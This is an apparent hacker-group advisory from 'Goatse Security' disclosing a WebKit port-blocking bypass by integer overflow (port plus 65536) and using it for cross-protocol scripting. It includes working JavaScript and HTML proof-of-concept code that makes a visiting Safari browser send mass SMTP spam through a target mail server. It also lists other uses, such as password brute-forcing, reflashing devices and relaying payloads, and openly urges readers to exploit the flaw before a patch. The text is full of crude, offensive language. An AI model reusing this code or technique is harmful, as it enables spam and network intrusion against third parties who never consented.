g . o . a . t . s . e s . e . c . u . r . i . t . y
g . a . p . i . n . g h . o . l . e . s e . x . p . o . s . e . d
http://security.goatse.fr/
(323) 306-4576
attention: due to technical limitations, this advisory cannot be displayed
correctly. to view with images and video, visit the following page:
http://encyclopediadramatica.com/Safari_XPS_Attack
warning: some of the content on this link may offend you and your employer.
We at the Goatse Security labs have been delving into an old (but also new)
class of web exploits originally coined cross-protocol scripting, but now more
commonly referred to as inter-protocol exploitation.
Goatse Security has a double feature for you, starting with a 0day vuln:
* Safari (and other webkit-based)browser port blocking bypassed by integer overflow
and a technique that, as far as I know, has not been premiered before:
* XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in
XPS/IPE attacks
We're going to show you how these two methods combine like Voltron into a whole
much larger than its parts. At the end of this short advisory you will be able
to take any Safari web browser and make it a spam drone, a wordlist-based logon
cracker for networks, or a relay for payloads to arbitrary daemons. You will be
able to do all of this without passing any shellcode or alerting any IDS to
compromise.
Let's cover the bug.
First, I would like to give credit to my cat, Gary C. Berries, as the initial
researcher to uncover this bug. Without my cat's assistance as an enterprise
class keyboard-based integer fuzzer this vulnerability would have been left
unearthed.
Apple is going to learn several lessons here, the most important of which is
probably not to let an unsigned short pose as anything other than an unsigned
short. Open up a Safari browser on your favorite chode-sniffing operating
system. Go to a "banned" port like 25 and you'll get an error:
___Not allowed to use restricted network port___ (WebKitErrorDomain:103)
Add 65536 to 25 to make 65561 and revisit the site on this new port-- no such
cockblocking. You're good to go. You can now use the Safari web browser as a
device to hit any port on any address with a cross-protocol scripting attack.
HOWTO video! http://vimeo.com/10302434
List of Webkit-based browsers found to be affected:
OS X Safari
iPhone/iPod Safari
iPad Safari (confirmed with iPad Simulator in SDK 3.2 beta 4 w/ XCode 3.2.2)
Arora
iCab
OmniWeb
Stainless
The only Webkit-based browser found to not be vulnerable:
Google Chrome
For all Apple's talk of "think different" the only one actually doing so in
regards to browser security is Google. XSS, XPS/IPE, all the traditional
methods fail against Chrome. Google, I don't even care that you are the most
ruthlessly evil corporation in existence anymore. Your stuff just works. You
had me sold at functional reliability. There was a time in my life that I had
large concern about corporate ethics. Now I know that all corporations are
evil. Some more than others. The one who is evil and smart will only ruin you
with malice, where the one that is evil and stupid can ruin you out of both
malice and out of sheer incompetence.
To give this exploit a little of that "je ne sais quoi", we need to come up
with a good attack vector. Now we're going to show you how Apple didn't just
unearth a decade-old vulnerability and make it viable again a la Microsoft, it
actually becomes more viable to exploit in this new generation than it was at
the time of its inception. When cross-protocol scripting was born, Javascript
was pretty young. There wasn't a whole lot you could do with it then--any bits
of Javascript now called AJAX wouldn't be a cross-browser standard until 2004.
So I looked at this integer overflow and I thought to myself what exactly I'd
find this useful for. The answers I came up with were:
* Getting idiot Mac-using creative people at bulk mailing companies to click
on links which spew SMTP envelopes at their internal mailserver, thereby
utilizing someone else's email reputation to send CPA offers of my own.
* Bruteforcing device passwords via a wordlist and then phoning home
* Reflashing network devices with firmware more fun than the factory default
* Relay exploit payloads to non-HTTP daemons on arbitrary TCP ports
* Get a Safari web browser to do pretty much anything on any TCP port and not
have any current IDS/IPS in existence be any wiser for it.
We summarily implemented all of these things, but I'm going to show you how to
do the first one since the code is trivially altered to do many of the others.
Also because it is the most fun and easy way to monetize this particular vuln,
and I'm hoping other people will make use of it before Apple patches!
(The best part of our first cross-protocol scripting PoC release:
http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack
was seeing how many other people used it to summarily ruin every IRC network
that exists. What can I say? I love being an enabler.)
What you'll need:
* A PoS web browser from Apple
* An MTA that ignores synchronization and is error tolerant
For the latter you may be asking, what MTA ignores synchronization? Well, more
than one of them do out of the box. They generally cost five figs and are
intended for the direct email marketing industry. I'd love to tell you which
ones I got working but unfortunately I'm under NDA with them. Their software is
really good and central to my business and I paid a metric ton of cash for it,
so I would like to continue receiving updates and support and also not be sued.
I asked for permission to mention their name in a Goatse advisory but they were
none too pleased with the idea. So you will have to just make an educated
guess. There are only so many pieces of SMTP software that will cost you the
price of a decent car.
Regardless, ignoring synchronization ain't exactly a bug, it is a feature.
This advisory is not about who writes a good SMTP server for sending bulk!
So, to initially send our first mail I tried a classic document.getElementById
and a parentNode.submit(), but found this particular vector for XPS didn't work
in Safari. So for the first wave of testing I used a multipart/form-data
enctyped POST with a document.formname.submit.
PoC video here: http://vimeo.com/10383253
So now that I know that its possible to send an email, I'll want to make a mass
producing industrial line out of this bitch. We'll want a silent and deadly bit
of javascript in an innocuous page which continually refreshes a child iframe
when it is done sending its current batch of emails, whilst the child will
scrape mailing list and potentially other merge data from a function referenced
from the parent node in the DOM tree.
The parent frame is gonna look something like this:
<iframe src="/" id="m9"></iframe>
<script>
var i = 0;
var emails;
var xhr = new XMLHttpRequest();
var url = "emails.php"
xhr.open("GET", url, true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
emails = eval(xhr.responseText);
window.setInterval(function () {
var m = document.getElementById('m9');
m.src="m9.html";
}, 1000);
}
};
xhr.send(null);
function getEmails() {
var e = [];
for (var x=0; x<10; x++) {
e[x] = emails[i++]
}
return e;
}
</script>
While the child m9.html will look something like this:
<form method="POST" enctype="multipart/form-data" action="http://target.mailserver:65561/" id="weevil">
<textarea id="cmd" name="cmd" rows="4" cols="70">
</textarea>
<br/><input type="submit" value="Submit">
</form>
<script>
email(parent.getEmails());
function email(x) {
var cmd = document.getElementById('cmd');
cmd.value = "\nEHLO security.goatse.fr\n";
for (var i = 0; i < x.length; i++) {
cmd.value += "MAIL FROM:weev (at) security.goatse (dot) fr [email concealed]\n";
console.log(x[i]);
cmd.value += "RCPT TO: " + x[i] + "\nDATA\nSubject: JIZZTAPO\n14\n88\nRUINRUINRUINRUIN\nOKAY THIS MAIL IS OVER NOW\nLOL\n\n.\n\n\n";
}
cmd.value += "QUIT\n";
document.getElementById('weevil').submit();
}
</script>
So, there you have it. XHR is practically like some sort of God-damned voodoo,
and now that it's out of the box with unblocked ports I hope ya'll have fun
with it before patch time. I know this particular advisory was a little tl;dr
but we're tired of people saying that this is all according to the HTTP RFC
and isn't a big deal or a vulnerability (here's lookin at you, Secunia). If
this is how web browsers are supposed to behave, all you security people have
got a heap o trouble to look forward to.
If ya'll want to hear more about this technique and get more example codes,
you can check out the first issue of http://plzadvise.com/ PLZ advise, out
May-ish. There will be a more substantial paper there.
With love,
Goatse Security
--- About Goatse Security ---
We are people that do shit. You may not like what we do, but we get shit done.
http://www.people.com/people/article/0,,20351567,00.html
"Spencer Pratt Leaves The Hills to Fight Cyber Crime"
This is who you're going to be working with. Inane, whitepaper-writing idiots
who have the intelligence and depth of a reality TV show star. Go back to work.
Sit at your desk. Breathe the stale air under the pale glow of the flourescent
lights and remember: you're on the same side as Speidi.
At Goatse Security, we don't really care about fighting cyberterrorism or cyber
crime or whatever. We are pioneering new classes of exploits, new methods of
evading IDS and new ways to use computers as tools to make shit happen. Our
minds won't be owned by some liar's system of ethics, but they are for rent to
any God or government (or corporation or criminal organization) that will write
a check of sufficient size. We invite you to stop pretending you care about
making things more secure and just admit you're too unskilled to be a real
mercenary.
--- Greets ---
GNAA
my cat, Gary C. Berries for being the initial discoverer of this vulnerability
g0udatron[gapp], Rucas, Jacksonbrown, Hephaestus Security
sloth, Joseph Evers, girlvinyl, Sam Hocevar,
Jesus Christ the once and future king,
and all men who love merriment
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFLqRZj5Zqjhz/9XfMRAuH/AJwL8Q8uEhRSpkYvLSve31iCL+WRRgCgiF0n
vQGX1xZsYDfPy1QPTHrKPNU=
=8a6r
-----END PGP SIGNATURE-----